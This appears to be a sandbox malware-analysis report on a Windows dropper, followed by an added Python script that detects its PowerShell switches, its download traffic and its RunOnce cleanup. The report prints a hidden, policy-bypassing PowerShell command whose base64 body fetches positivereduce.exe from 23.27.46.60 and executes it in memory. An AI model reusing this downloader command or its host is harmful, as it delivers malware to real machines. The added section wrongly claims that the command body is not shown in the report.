Summary | ZeroBOX

kinddevelopers.exe

Emotet Gen1 Generic Malware Malicious Library Antivirus UPX PE File PE64 CAB
Category FILE
Machine s1_win7_x6403_us
Started March 3, 2025, 2:43 p.m.
Completed March 3, 2025, 2:53 p.m.
Size 180.0KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 8199d03b6325b026657ac08f637e78de
SHA256 d6b04e732eceeab6e57bd5fdeafa214dcde714f4f9209ed858c5f391646a8b47
CRC32 9CFD23C8
ssdeep 3072:YMobR7ezAjLOZvmX1Z5vWp1icKAArDZz4N9GhbkENEkrzd:9eR7eammIp0yN90vE+
PDB Path wextract.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
23.27.46.60 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API        Arguments                  Status  Return  Repeated
GetComputerNameW  computer_name: TEST22-PC   1       1       0
GetComputerNameW  computer_name: TEST22-PC   1       1       0
GetComputerNameW  computer_name: TEST22-PC   1       1       0
GetComputerNameW  computer_name: TEST22-PC   1       1       0
GetComputerNameA  computer_name: TEST22-PC   1       1       0
GetComputerNameW  computer_name: TEST22-PC   1       1       0
GetComputerNameW  computer_name: TEST22-PC   1       1       0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: '■' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x000000000000000b
1 1 0
Time & API Arguments Status Return Repeated
Common to all 44 CryptExportKey calls below: buffer: <INVALID POINTER>, flags: 0, crypto_export_handle: 0x0000000000000000, blob_type: 6. Only crypto_handle varies.

API             crypto_handle       Status  Return  Repeated
CryptExportKey  0x0000000000437cc0  1       1       0
CryptExportKey  0x000000001b357370  1       1       0
CryptExportKey  0x000000001b357370  1       1       0
CryptExportKey  0x000000001b357370  1       1       0
CryptExportKey  0x000000001b372320  1       1       0
CryptExportKey  0x000000001b372320  1       1       0
CryptExportKey  0x000000001b372390  1       1       0
CryptExportKey  0x000000001b372390  1       1       0
CryptExportKey  0x000000001b372390  1       1       0
CryptExportKey  0x000000001b372390  1       1       0
CryptExportKey  0x000000001b3724e0  1       1       0
CryptExportKey  0x000000001b3724e0  1       1       0
CryptExportKey  0x000000001b3724e0  1       1       0
CryptExportKey  0x000000001b3722b0  1       1       0
CryptExportKey  0x000000001b3722b0  1       1       0
CryptExportKey  0x000000001b3722b0  1       1       0
CryptExportKey  0x000000001b372550  1       1       0
CryptExportKey  0x000000001b372550  1       1       0
CryptExportKey  0x000000001b372550  1       1       0
CryptExportKey  0x000000001b372550  1       1       0
CryptExportKey  0x000000001b372550  1       1       0
CryptExportKey  0x000000001b372550  1       1       0
CryptExportKey  0x000000001b372550  1       1       0
CryptExportKey  0x000000001b372550  1       1       0
CryptExportKey  0x000000001b372be0  1       1       0
CryptExportKey  0x000000001b372be0  1       1       0
CryptExportKey  0x000000001b372be0  1       1       0
CryptExportKey  0x000000001b3722b0  1       1       0
CryptExportKey  0x000000001b3722b0  1       1       0
CryptExportKey  0x000000001b372c50  1       1       0
CryptExportKey  0x000000001b372c50  1       1       0
CryptExportKey  0x000000001b3722b0  1       1       0
CryptExportKey  0x000000001b3722b0  1       1       0
CryptExportKey  0x000000001b3722b0  1       1       0
CryptExportKey  0x000000001b372ef0  1       1       0
CryptExportKey  0x000000001b372ef0  1       1       0
CryptExportKey  0x000000001b372ef0  1       1       0
CryptExportKey  0x000000001b372ef0  1       1       0
CryptExportKey  0x000000001b39a090  1       1       0
CryptExportKey  0x000000001b39a090  1       1       0
CryptExportKey  0x000000001b372550  1       1       0
CryptExportKey  0x000000001b372550  1       1       0
CryptExportKey  0x000000001b372550  1       1       0
CryptExportKey  0x000000001b372550  1       1       0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path wextract.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
resource name AVI
suspicious_features Connection to IP address suspicious_request GET http://23.27.46.60/a0001/0228-01/positivereduce.exe
request GET http://23.27.46.60/a0001/0228-01/positivereduce.exe
Time & API Arguments Status Return Repeated
Common to all 50 calls below: process_identifier: 2136, stack_dep_bypass: 0, stack_pivoted: 0, protection: 64 (PAGE_EXECUTE_READWRITE), process_handle: 0xffffffffffffffff. NtAllocateVirtualMemory reports region_size and allocation_type; NtProtectVirtualMemory reports length and has no allocation_type.

API                      region_size/length  heap_dep_bypass  base_address        allocation_type                      Status  Return  Repeated
NtAllocateVirtualMemory  983040              0                0x0000000002580000  8192 (MEM_RESERVE)                   1       0       0
NtAllocateVirtualMemory  8192                1                0x00000000025f0000  4096 (MEM_COMMIT)                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef35b1000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef382e000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef382e000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef382f000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef382f000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef382f000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef382f000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef382f000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef382f000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef382f000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef382f000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef3830000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef3830000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef3830000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef3830000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef3830000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef3831000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef3831000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef3831000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef3831000  -                                    1       0       0
NtProtectVirtualMemory   4096                0                0x000007fef382e000  -                                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff00032000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  589824              0                0x000007fffff10000  1056768 (MEM_RESERVE|MEM_TOP_DOWN)   1       0       0
NtAllocateVirtualMemory  4096                1                0x000007fffff10000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007fffff10000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  65536               0                0x000007fffff00000  1056768 (MEM_RESERVE|MEM_TOP_DOWN)   1       0       0
NtAllocateVirtualMemory  4096                1                0x000007fffff00000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff000ea000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff00022000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  8192                1                0x00000000025f2000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  12288               1                0x00000000025f4000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff000fa000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff00033000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff00034000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff00122000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff000fd000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff000eb000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff000e2000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff00035000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff00170000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff00023000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff00036000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff00123000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff000ec000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff000e3000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff0002a000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  4096                1                0x000007ff00037000  4096 (MEM_COMMIT)                    1       0       0
NtAllocateVirtualMemory  16384               1                0x00000000025f7000  4096 (MEM_COMMIT)                    1       0       0
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\positivereduces.bat
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQ7IFdpbmRvd3MgTlQgMTAuMDsgZW4tVVMpIFdpbmRvd3NQb3dlclNoZWxsLzUuMS4xOTA0MS41NDg2JykKJGJ5dGVzPSR3Yy5Eb3dubG9hZERhdGEoJ2h0dHA6Ly8yMy4yNy40Ni42MC9hMDAwMS8wMjI4LTAxL3Bvc2l0aXZlcmVkdWNlLmV4ZScpCiRhc3NlbT1bUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJ5dGVzKQokYXNzZW0uRW50cnlQb2ludC5JbnZva2UoJG51bGwsJG51bGwp')))}"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2140
thread_handle: 0x000000000000006c
process_identifier: 2136
current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQ7IFdpbmRvd3MgTlQgMTAuMDsgZW4tVVMpIFdpbmRvd3NQb3dlclNoZWxsLzUuMS4xOTA0MS41NDg2JykKJGJ5dGVzPSR3Yy5Eb3dubG9hZERhdGEoJ2h0dHA6Ly8yMy4yNy40Ni42MC9hMDAwMS8wMjI4LTAxL3Bvc2l0aXZlcmVkdWNlLmV4ZScpCiRhc3NlbT1bUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJ5dGVzKQokYXNzZW0uRW50cnlQb2ludC5JbnZva2UoJG51bGwsJG51bGwp')))}"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000068
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
section .rsrc (size_of_data 0x0001e000, virtual_address 0x0000f000, virtual_size 0x0001dcfa, entropy 6.888643446187668) description A section with a high entropy has been found
entropy 0.681818181818 description Overall entropy of this PE file is high
Data received HTTP/1.1 200 OK Date: Mon, 03 Mar 2025 05:51:54 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Fri, 28 Feb 2025 15:09:34 GMT ETag: "1d7200-62f3531ba2a41" Accept-Ranges: bytes Content-Length: 1929728 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program
Data sent GET /a0001/0228-01/positivereduce.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.5486
  Host: 23.27.46.60
  Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 23.27.46.60
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
Time & API Arguments Status Return Repeated

send

buffer: GET /a0001/0228-01/positivereduce.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.5486
  Host: 23.27.46.60
  Connection: Keep-Alive
socket: 1256
sent: 188
1 188 0
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK
  Date: Mon, 03 Mar 2025 05:51:54 GMT
  Server: Apache/2.4.58 (Ubuntu)
  Last-Modified: Fri, 28 Feb 2025 15:09:34 GMT
  ETag: "1d7200-62f3531ba2a41"
  Accept-Ranges: bytes
  Content-Length: 1929728
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdos-program
  [body: PE image beginning "MZ ... This program cannot be run in DOS mode." with sections .text, .rsrc and .reloc; the remaining bytes of this chunk are non-printable and omitted]
received: 2920
socket: 1256
1 2920 0
option -ep bypass value Sets the PowerShell execution policy to Bypass (-ExecutionPolicy Bypass) so script-execution restrictions are not enforced
option -nop value Does not load the current user's PowerShell profile (-NoProfile)
option -windowstyle hidden value Runs the command with a hidden console window (-WindowStyle Hidden)
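The three PowerShell options above, the PowerShell User-Agent on the GET for positivereduce.exe, and the wextract RunOnce cleanup entry are the indicators an analyst would turn into detections. The script below is an added example, not part of the ZeroBOX output and not code from the sample: it normalises abbreviated powershell.exe switches (so that -ep, -nop and -windowstyle are matched as -ExecutionPolicy, -NoProfile and -WindowStyle), checks the HTTP exchange for a PowerShell-originated download of a PE image, and parses the advpack.dll,DelNodeRunDLL32 self-cleanup value. The request, response head and registry value are copied from the report; the powershell.exe command line is constructed from the three listed options (the report does not show the command body), and the switch table is this example's approximation of powershell.exe's prefix matching, not copied from it.

```python
"""Triage checks for the indicators in this report (added example; not ZeroBOX
or sample code). Inputs below are copied from the report except where noted."""
import re
import shlex

HTTP_REQUEST = (
    "GET /a0001/0228-01/positivereduce.exe HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) "
    "WindowsPowerShell/5.1.19041.5486\r\n"
    "Host: 23.27.46.60\r\nConnection: Keep-Alive\r\n\r\n"
)
HTTP_RESPONSE_HEAD = (  # status line, the two relevant headers, first body bytes
    b"HTTP/1.1 200 OK\r\nContent-Length: 1929728\r\n"
    b"Content-Type: application/x-msdos-program\r\n\r\nMZ\x90\x00\x03\x00"
)
# Constructed: only the three options are in the report, not the command body.
POWERSHELL_CMDLINE = 'powershell.exe -ep bypass -nop -windowstyle hidden -c "..."'
RUNONCE_VALUE = ('rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 '
                 '"C:\\Users\\test22\\AppData\\Local\\Temp\\IXP000.TMP\\"')

# powershell.exe accepts any prefix of a switch down to a per-switch minimum,
# plus explicit aliases (-ep, -ec). Assumption: this table approximates the
# real matching order; it is not copied from ConsoleHost.
PS_SWITCHES = [  # (canonical name, shortest accepted prefix, extra aliases)
    ("noprofile", "nop", ()), ("noninteractive", "noni", ()),
    ("nologo", "nol", ()), ("noexit", "noe", ()),
    ("command", "c", ()), ("windowstyle", "w", ()), ("file", "f", ()),
    ("encodedcommand", "e", ("ec",)), ("executionpolicy", "ex", ("ep",)),
]
VALUE_SWITCHES = {"command", "windowstyle", "file", "encodedcommand", "executionpolicy"}
EVASION = {  # (switch, value or None for any value) -> why it matters
    ("executionpolicy", "bypass"): "execution policy bypassed",
    ("executionpolicy", "unrestricted"): "execution policy bypassed",
    ("windowstyle", "hidden"): "console window hidden from the user",
    ("noprofile", None): "user profile skipped (profile-based logging/hooks avoided)",
    ("encodedcommand", None): "base64-encoded command body",
}

def canonical_switch(token):
    """'-ep' -> 'executionpolicy'; None for non-switches or ambiguous prefixes."""
    if not token.startswith(("-", "/")):
        return None
    t = token[1:].lower()
    for name, shortest, aliases in PS_SWITCHES:
        if t in aliases or (name.startswith(t) and len(t) >= len(shortest)):
            return name
    return None

def parse_powershell(cmdline):
    """Return {canonical switch: value or True} for a powershell.exe command line."""
    tokens = shlex.split(cmdline, posix=False)  # keep Windows quoting intact
    found, i = {}, 0
    while i < len(tokens):
        sw = canonical_switch(tokens[i])
        if sw == "command":  # everything after -Command is the script text
            found[sw] = " ".join(tokens[i + 1:])
            break
        if sw in VALUE_SWITCHES and i + 1 < len(tokens):
            found[sw], i = tokens[i + 1].lower(), i + 2
        else:
            if sw:
                found[sw] = True
            i += 1
    return found

def powershell_findings(cmdline):
    found = parse_powershell(cmdline)
    return [why for (sw, val), why in EVASION.items()
            if sw in found and (val is None or found[sw] == val)]

PS_UA = re.compile(r"WindowsPowerShell/(\d+(?:\.\d+){3})")

def http_findings(request, response_head):
    """Flag a PowerShell-originated fetch whose body starts as a PE image."""
    hits = []
    req_line, _, rest = request.partition("\r\n")
    _method, path, _ = req_line.split(" ", 2)
    hdr = dict(l.split(": ", 1) for l in rest.split("\r\n") if ": " in l)
    m = PS_UA.search(hdr.get("User-Agent", ""))
    if m:
        hits.append(f"client is Windows PowerShell web cmdlets ({m.group(1)})")
    if re.search(r"\.(exe|dll|scr)$", path, re.I):
        hits.append(f"requested executable path {path}")
    head, _, body = response_head.partition(b"\r\n\r\n")
    if body.startswith(b"MZ"):
        hits.append("response body begins with MZ (PE image)")
    if b"application/x-msdos-program" in head.lower():
        hits.append("server labels the body application/x-msdos-program")
    return hits

def runonce_findings(reg_value):
    """wextract/IExpress self-cleanup: rundll32 advpack.dll,DelNodeRunDLL32 <dir>."""
    m = re.search(r'advpack\.dll,DelNodeRunDLL32\s+"?([^"]+)', reg_value, re.I)
    return [f"RunOnce deletes extraction directory {m.group(1)} at next logon"] if m else []

if __name__ == "__main__":
    for label, hits in (("powershell", powershell_findings(POWERSHELL_CMDLINE)),
                        ("http", http_findings(HTTP_REQUEST, HTTP_RESPONSE_HEAD)),
                        ("runonce", runonce_findings(RUNONCE_VALUE))):
        for h in hits:
            print(f"[{label}] {h}")
```

The switch normalisation is the part that matters for detection rules: a rule that matches the literal string "-ExecutionPolicy Bypass" misses the "-ep bypass" form this dropper uses, whereas matching on the canonical name after prefix expansion catches both; ambiguous prefixes such as "-no" deliberately return None, as powershell.exe rejects them.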
Lionic Trojan.Win32.Generic.4!c
Cynet Malicious (score: 99)
CAT-QuickHeal cld.trojan.multi
Skyhigh BehavesLike.Win64.Downloader.ch
Cylance Unsafe
VIPRE Heur.BZC.MNT.Boxter.928.78081E43
CrowdStrike win/malicious_confidence_90% (W)
Symantec ML.Attribute.HighConfidence
Elastic malicious (moderate confidence)
ESET-NOD32 a variant of Generik.DFHLNP
APEX Malicious
Avast Other:Malware-gen [Trj]
Kaspersky UDS:DangerousObject.Multi.Generic
MicroWorld-eScan Heur.BZC.MNT.Boxter.928.78081E43
F-Secure Trojan.TR/AVI.Agent.rayca
TrendMicro TrojanSpy.Win64.STRELASTEALER.YXFCAZ
McAfeeD ti!D6B04E732ECE
CTX exe.trojan.generic
Sophos Mal/Generic-S
Ikarus Trojan.Win32.Themida
Google Detected
Avira TR/AVI.Agent.rayca
Kingsoft Win32.Troj.Unknown.a
Microsoft Trojan:Win32/Wacatac.B!ml
GData BAT.Malware.InvalidBOM.A
Varist ABDownloader.USN
AhnLab-V3 Trojan/Win.Malware-gen.C5735810
McAfee Artemis!8199D03B6325
DeepInstinct MALICIOUS
Panda Trj/Chgt.AD
TrendMicro-HouseCall TrojanSpy.Win64.STRELASTEALER.YXFCAZ
Tencent Win32.Trojan-Downloader.Agent.Wimw
Fortinet W32/PossibleThreat
AVG Other:Malware-gen [Trj]
Paloalto generic.ml